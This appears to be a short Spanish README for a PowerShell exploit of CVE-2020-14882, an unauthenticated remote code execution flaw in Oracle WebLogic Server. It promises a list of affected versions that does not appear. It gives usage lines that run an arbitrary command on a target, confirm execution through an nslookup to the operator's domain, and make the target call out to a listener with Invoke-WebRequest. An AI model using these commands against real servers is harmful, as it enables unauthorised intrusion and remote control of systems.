
CVE-2020-14882 reescrito en PowerShell
Este script de PowerShell explota CVE-2020-14882 para lograr ejecución remota de código no autenticada en las siguientes versiones de Oracle WebLogic Server:
.\exploit.ps1 -target 'http(s)://target:7001' -command 'your_command'
.\exploit.ps1 -target 'http(s)://target:7001' -command 'nslookup your_Domain'
.\exploit.ps1 -target 'http(s)://target:7001' -command 'powershell.exe -c Invoke-WebRequest -Uri http://your_listener'